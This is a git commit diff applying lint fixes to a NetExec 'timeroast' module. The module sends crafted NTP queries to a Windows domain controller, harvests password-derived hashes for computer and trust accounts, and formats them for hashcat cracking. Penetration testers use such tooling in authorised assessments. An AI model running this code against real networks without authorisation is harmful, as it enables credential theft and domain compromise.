fix: ruff check

Disgame · Disgame · commit e7d30329ed60 · 2024-05-18T01:39:27.000+02:00
diff --git a/nxc/modules/timeroast.py b/nxc/modules/timeroast.py
@@ -7,24 +7,22 @@
 
 
 def hashcat_format(rid, hashval, salt):
-    """
-    Encodes hash in Hashcat-compatible format (with username prefix).
-    """
-    return f'{rid}:$sntp-ms${hexlify(hashval).decode()}${hexlify(salt).decode()}'
+    """Encodes hash in Hashcat-compatible format (with username prefix)."""
+    return f"{rid}:$sntp-ms${hexlify(hashval).decode()}${hexlify(salt).decode()}"
 
 class NXCModule:
-    '''
+    """
     Module by Disgame: @Disgame
     Based on research from SecuraBV (@SecuraBV)
 
     https://github.com/SecuraBV/Timeroast/
 
     Much of this code was copied from the original implementation.
-    '''
+    """
 
-    name = 'timeroast'
-    description = 'Timeroasting exploits Windows NTP authentication to request password hashes of any computer or trust account'
-    supported_protocols = ['smb']
+    name = "timeroast"
+    description = "Timeroasting exploits Windows NTP authentication to request password hashes of any computer or trust account"
+    supported_protocols = ["smb"]
     opsec_safe = True
     multiple_hosts = False
 
@@ -33,7 +31,7 @@ def __init__(self):
         self.module_options = None
 
         # Static NTP query prefix using the MD5 authenticator. Append 4-byte RID and dummy checksum to create a full query.
-        self.ntp_prefix = unhexlify('db0011e9000000000001000000000000e1b8407debc7e50600000000000000000000000000000000e1b8428bffbfcd0a')
+        self.ntp_prefix = unhexlify("db0011e9000000000001000000000000e1b8407debc7e50600000000000000000000000000000000e1b8428bffbfcd0a")
         
 
     def options(self, context, module_options):
@@ -61,10 +59,10 @@ def on_login(self, context, connection):
 
         context.log.display("Starting Timeroasting...")
         
-        for rid, hash, salt in self.run_ntp_roast(context, self.target, self.rids, self.rate, self.timeout, self.old_hashes, self.src_port):
-            context.log.highlight(hashcat_format(rid, hash, salt))
+        for rid, md5hash, salt in self.run_ntp_roast(context, self.target, self.rids, self.rate, self.timeout, self.old_hashes, self.src_port):
+            context.log.highlight(hashcat_format(rid, md5hash, salt))
 
-    def run_ntp_roast(self, context, dc_host, rids, rate, giveup_time, old_pwd, src_port = 0):
+    def run_ntp_roast(self, context, dc_host, rids, rate, giveup_time, old_pwd, src_port=0):
         """Gathers MD5(MD4(password) || NTP-response[:48]) hashes for a sequence of RIDs.
         Rate is the number of queries per second to send.
         Will quit when either rids ends or no response has been received in giveup_time seconds. Note that the server will 
@@ -73,16 +71,15 @@ def run_ntp_roast(self, context, dc_host, rids, rate, giveup_time, old_pwd, src_
         
         Yields (rid, hash, salt) pairs, where salt is the NTP response data.
         """
-
         # Flag in key identifier that indicates whether the old or new password should be used.
         keyflag = 2**31 if old_pwd else 0
 
         # Bind UDP socket.
         with socket(AF_INET, SOCK_DGRAM) as sock:
             try:
-                sock.bind(('0.0.0.0', src_port))
+                sock.bind(("0.0.0.0", src_port))
             except PermissionError:
-                context.log.exception(f'No permission to listen on port {src_port}. May need to run as root.')
+                context.log.exception(f"No permission to listen on port {src_port}. May need to run as root.")
 
 
             query_interval = 1 / rate
@@ -94,7 +91,7 @@ def run_ntp_roast(self, context, dc_host, rids, rate, giveup_time, old_pwd, src_
                 # Send out query for the next RID, if any.
                 query_rid = next(rid_iterator, None)
                 if query_rid is not None:
-                    query = self.ntp_prefix + pack('<I', query_rid ^ keyflag) + b'\x00' * 16
+                    query = self.ntp_prefix + pack("<I", query_rid ^ keyflag) + b"\x00" * 16
                     sock.sendto(query, (dc_host, 123))
 
                 # Wait for either a response or time to send the next query.
@@ -105,7 +102,7 @@ def run_ntp_roast(self, context, dc_host, rids, rate, giveup_time, old_pwd, src_
                     # Extract RID, hash and "salt" if succesful.
                     if len(reply) == 68:
                         salt = reply[:48]
-                        answer_rid = unpack('<I', reply[-20:-16])[0] ^ keyflag
+                        answer_rid = unpack("<I", reply[-20:-16])[0] ^ keyflag
                         md5hash = reply[-16:]
 
                     # Filter out duplicates.
